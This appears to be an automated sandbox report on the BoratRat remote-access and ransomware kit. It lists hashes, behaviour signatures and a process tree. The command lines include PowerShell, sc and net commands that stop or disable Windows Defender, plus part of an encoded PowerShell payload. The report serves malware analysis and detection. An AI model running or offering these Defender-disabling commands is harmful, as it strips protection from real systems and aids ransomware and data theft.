Overview (overview): 10
Static (static): 10
Borat.rar (windows11-21h2-x64): 10
Borat/BoratRat.exe (windows11-21h2-x64): 10
Borat/bin/Audio.dll (windows11-21h2-x64): 1
Borat/bin/Discord.dll (windows11-21h2-x64): 1
Borat/bin/Extra.dll (windows11-21h2-x64): 1
Borat/bin/...er.dll (windows11-21h2-x64): 1
Borat/bin/...er.dll (windows11-21h2-x64): 1
Borat/bin/Fun.dll (windows11-21h2-x64): 1
Borat/bin/...on.dll (windows11-21h2-x64): 1
Borat/bin/...er.exe (windows11-21h2-x64): 1
Borat/bin/Logger.dll (windows11-21h2-x64): 1
Borat/bin/...ib.dll (windows11-21h2-x64): 1
Borat/bin/...us.dll (windows11-21h2-x64): 1
Borat/bin/Netstat.dll (windows11-21h2-x64): 1
Borat/bin/Options.dll (windows11-21h2-x64): 1
Borat/bin/...er.dll (windows11-21h2-x64): 1
Borat/bin/...re.dll (windows11-21h2-x64): 1
Borat/bin/...ry.dll (windows11-21h2-x64): 1
Borat/bin/Regedit.dll (windows11-21h2-x64): 1
Borat/bin/...ra.dll (windows11-21h2-x64): 1
Borat/bin/...op.dll (windows11-21h2-x64): 1
Borat/bin/...xy.dll (windows11-21h2-x64): 1
Borat/bin/...le.dll (windows11-21h2-x64): 1
Borat/bin/...ry.dll (windows11-21h2-x64): 1
Borat/bin/...ion.db (windows11-21h2-x64): 3
Borat/raw/Client.exe (windows11-21h2-x64): 1

Analysis
max time kernel: 830s
max time network: 489s
platform: windows11-21h2_x64
resource: win11-20240611-en
resource tags: arch:x64, arch:x86, image:win11-20240611-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 29-06-2024 18:40

Behavioral task | Sample | Resource
behavioral1 | Borat.rar | win11-20240611-en
behavioral2 | Borat/BoratRat.exe | win11-20240611-en
behavioral3 | Borat/bin/Audio.dll | win11-20240611-en
behavioral4 | Borat/bin/Discord.dll | win11-20240611-en
behavioral5 | Borat/bin/Extra.dll | win11-20240508-en
behavioral6 | Borat/bin/FileManager.dll | win11-20240419-en
behavioral7 | Borat/bin/FileSearcher.dll | win11-20240508-en
behavioral8 | Borat/bin/Fun.dll | win11-20240508-en
behavioral9 | Borat/bin/Information.dll | win11-20240611-en
behavioral10 | Borat/bin/Keylogger.exe | win11-20240611-en
behavioral11 | Borat/bin/Logger.dll | win11-20240611-en
behavioral12 | Borat/bin/MessagePackLib.dll | win11-20240508-en
behavioral13 | Borat/bin/Miscellaneous.dll | win11-20240508-en
behavioral14 | Borat/bin/Netstat.dll | win11-20240611-en
behavioral15 | Borat/bin/Options.dll | win11-20240508-en
behavioral16 | Borat/bin/ProcessManager.dll | win11-20240611-en
behavioral17 | Borat/bin/Ransomware.dll | win11-20240508-en
behavioral18 | Borat/bin/Recovery.dll | win11-20240611-en
behavioral19 | Borat/bin/Regedit.dll | win11-20240611-en
behavioral20 | Borat/bin/RemoteCamera.dll | win11-20240508-en
behavioral21 | Borat/bin/RemoteDesktop.dll | win11-20240508-en
behavioral22 | Borat/bin/ReverseProxy.dll | win11-20240611-en
behavioral23 | Borat/bin/SendFile.dll | win11-20240611-en
behavioral24 | Borat/bin/SendMemory.dll | win11-20240508-en
behavioral25 | Borat/bin/ip2region.db | win11-20240508-en
behavioral26 | Borat/raw/Client.exe | win11-20240508-en

General
Target: Borat.rar
Size: 9.6MB
MD5: e3b10d235c365ac49d6855df0432bb76
SHA1: 4ce182c19796cf8d4c017fdd8fd4b390de1eac7e
SHA256: 53cdc49c7fb83b419c07edb45c544b106aaa37db00e8a37211678af6350a82f1
SHA512: bb91a4bf979516c2a19733772b4c34b09b45efbcec491f2fb62adde9222e6306ce32a17de3e6f9b3d7338a93f3d72e4747a23157675663f00e9f153bc4ec4704
SSDEEP: 196608:XrmtNiLocMQin2MKY9U6Qw9w/ZpX4ff5c4lgg0:7mt5tn2y9Woff5c4G

Malware Config
Signatures

Processes: powershell.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | powershell.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes: powershell.exe
description | pid | process | target process
PID 4804 created 688 | 4804 | powershell.exe | lsass.exe

Renames multiple (7080) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.

Executes dropped EXE 4 IoCs
Processes: BoratRat.exe, Client.exe, Client.exe, DECRYPT.exe
pid | process
3008 | BoratRat.exe
1220 | Client.exe
3592 | Client.exe
1864 | DECRYPT.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes: unregmp2.exe
Drops file in Program Files directory 64 IoCs
Processes: Client.exe, Client.exe
Launches sc.exe 3 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes: sc.exe, sc.exe, sc.exe
pid | process
1448 | sc.exe
1876 | sc.exe
4272 | sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes: taskmgr.exe, msinfo32.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | taskmgr.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | taskmgr.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | msinfo32.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | msinfo32.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs | msinfo32.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | msinfo32.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | msinfo32.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | msinfo32.exe

Enumerates system info in registry 2 TTPs 9 IoCs
Processes: msedge.exe, msinfo32.exe, msedge.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | msinfo32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ECFirmwareMajorRelease | msinfo32.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msinfo32.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe

Modifies data under HKEY_USERS 46 IoCs
Processes: powershell.exe
Modifies registry class 64 IoCs
Processes: BoratRat.exe, OpenWith.exe, MiniSearchHost.exe, OpenWith.exe, OpenWith.exe
Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" BoratRat.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" BoratRat.exe Set value (str) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" BoratRat.exe Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 BoratRat.exe Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 00000000ffffffff BoratRat.exe Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 19002f433a5c000000000000000000000000000000000000000000 BoratRat.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 BoratRat.exe Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0 = 5000310000000000cb58d9b2100041646d696e003c0009000400efbecb588aaddd5826952e0000006a570200000001000000000000000000000000000000e0ce8400410064006d0069006e00000014000000 BoratRat.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\0\NodeSlot = "6" BoratRat.exe Key created 
\REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg BoratRat.exe Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 BoratRat.exe Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202 BoratRat.exe Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\0\MRUListEx = ffffffff BoratRat.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" BoratRat.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 BoratRat.exe Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff BoratRat.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell BoratRat.exe Set value (str) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\SniffedFolderType = "Generic" BoratRat.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local 
Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" BoratRat.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" BoratRat.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU BoratRat.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" BoratRat.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" BoratRat.exe Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = 00000000ffffffff BoratRat.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0 BoratRat.exe Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 14002e803accbfb42cdb4c42b0297fe99a87c6410000 BoratRat.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid process
3008 BoratRat.exe
4804 powershell.exe
1128 powershell.exe
2128 taskmgr.exe
-
Suspicious behavior: GetForegroundWindowSpam 4 IoCs
Processes:
pid process
3008 BoratRat.exe
2128 taskmgr.exe
2244 OpenWith.exe
3264 msinfo32.exe
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
Processes:
pid process
3720 msedge.exe
2112 msedge.exe
-
Suspicious behavior: RenamesItself 1 IoCs
Processes:
pid process
3592 Client.exe
-
Suspicious use of AdjustPrivilegeToken 52 IoCs
Processes:
description pid process
Token: SeRestorePrivilege 3420 7zG.exe
Token: 35 3420 7zG.exe
Token: SeSecurityPrivilege 3420 7zG.exe
Token: SeDebugPrivilege 3008 BoratRat.exe
Token: SeDebugPrivilege 1220 Client.exe
Token: SeDebugPrivilege 4804 powershell.exe
Token: SeDebugPrivilege 4584 whoami.exe
Token: SeDebugPrivilege 1128 powershell.exe
Token: SeDebugPrivilege 2156 whoami.exe
Token: SeDebugPrivilege 2128 taskmgr.exe
Token: SeSystemProfilePrivilege 2128 taskmgr.exe
Token: SeCreateGlobalPrivilege 2128 taskmgr.exe
Token: SeDebugPrivilege 3592 Client.exe
Token: SeShutdownPrivilege 1424 unregmp2.exe
Token: SeCreatePagefilePrivilege 1424 unregmp2.exe
Token: SeBackupPrivilege 3892 vssvc.exe
Token: SeRestorePrivilege 3892 vssvc.exe
Token: SeAuditPrivilege 3892 vssvc.exe
Token: SeDebugPrivilege 1864 DECRYPT.exe
-
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
pid process
3420 7zG.exe
3008 BoratRat.exe
2128 taskmgr.exe
-
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
pid process
3008 BoratRat.exe
2128 taskmgr.exe
-
Suspicious use of SetWindowsHookEx 33 IoCs
Processes:
pid process
1784 OpenWith.exe
3008 BoratRat.exe
2244 OpenWith.exe
996 OpenWith.exe
4652 OpenWith.exe
1748 OpenWith.exe
1368 OpenWith.exe
2264 MiniSearchHost.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description pid process target process
PID 1220 wrote to memory of 4804 1220 Client.exe powershell.exe
PID 4804 wrote to memory of 1448 4804 powershell.exe sc.exe
PID 4804 wrote to memory of 788 4804 powershell.exe cmd.exe
PID 4804 wrote to memory of 4584 4804 powershell.exe whoami.exe
PID 4804 wrote to memory of 2432 4804 powershell.exe net1.exe
PID 4804 wrote to memory of 2476 4804 powershell.exe net1.exe
PID 4804 wrote to memory of 1128 4804 powershell.exe powershell.exe
PID 1128 wrote to memory of 1876 1128 powershell.exe sc.exe
PID 1128 wrote to memory of 2516 1128 powershell.exe cmd.exe
PID 1128 wrote to memory of 2156 1128 powershell.exe whoami.exe
PID 1128 wrote to memory of 4952 1128 powershell.exe net1.exe
PID 1128 wrote to memory of 4272 1128 powershell.exe sc.exe
PID 3720 wrote to memory of 5068 3720 msedge.exe msedge.exe
PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:688
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}2⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1128 -
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend3⤵
- Launches sc.exe
PID:1876 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"3⤵PID:2516
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2156 -
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" stop windefend3⤵PID:4952
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE3⤵
- Launches sc.exe
PID:4272
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Borat.rar1⤵PID:3740
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1784
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1696
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\Borat\" -spe -an -ai#7zMap29299:68:7zEvent275851⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3420
-
C:\Users\Admin\Desktop\Borat\BoratRat.exe"C:\Users\Admin\Desktop\Borat\BoratRat.exe"1⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3008
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:3964
-
C:\Users\Admin\Desktop\Borat\Client.exe"C:\Users\Admin\Desktop\Borat\Client.exe"1⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1220 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc [Base64-encoded command removed]
AAYwBTAHMALQBUAE8ARwBHAEwARQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAKAHMAdABhAHIAdAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACsAJwBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAHAAQwBtAGQAUgB1AG4ALgBlAHgAZQAnACkAIAAtAEEAcgBnACAAJwAtAEQAaQBzAGEAYgBsAGUAUwBlAHIAdgBpAGMAZQAnACAALQB3AGkAbgAgADEACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABtAHAAZQBuAGcAaQBuAGUAZABiAC4AZABiACcAKQAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwACAAIAAgACAAIAAgACAAIAAgACAAIAAjACMAIABDAG8AbQBtAGUAbgB0AGUAZAAgAD0AIABrAGUAZQBwACAAcwBjAGEAbgAgAGgAaQBzAHQAbwByAHkACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAKACcAQAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwADsAIABpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkACgAjAC0AXwAtACMA2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4804 -
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend3⤵
- Launches sc.exe
PID:1448 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"3⤵PID:788
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4584 -
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start TrustedInstaller3⤵PID:2432
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start lsass3⤵PID:2476
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2128
-
C:\Users\Admin\Desktop\Borat\Client.exe"C:\Users\Admin\Desktop\Borat\Client.exe"1⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
PID:3592 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\READ-ME-NOW.txt2⤵PID:804
-
C:\Users\Admin\Desktop\DECRYPT.exe"C:\Users\Admin\Desktop\DECRYPT.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1864
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\CloseConvertTo.xhtml1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of WriteProcessMemory
PID:3720 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe8b923cb8,0x7ffe8b923cc8,0x7ffe8b923cd82⤵PID:5068
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1968,7431071974769138954,13518475369368192271,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1980 /prefetch:22⤵PID:3656
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1968,7431071974769138954,13518475369368192271,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:32⤵PID:1300
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1968,7431071974769138954,13518475369368192271,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2556 /prefetch:82⤵PID:3352
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,7431071974769138954,13518475369368192271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3164 /prefetch:12⤵PID:1032
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,7431071974769138954,13518475369368192271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:12⤵PID:4384
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:8
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2264
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2244
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\GetMeasure.mhtml1⤵
- Modifies Internet Explorer settings
PID:1616
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:2112 -
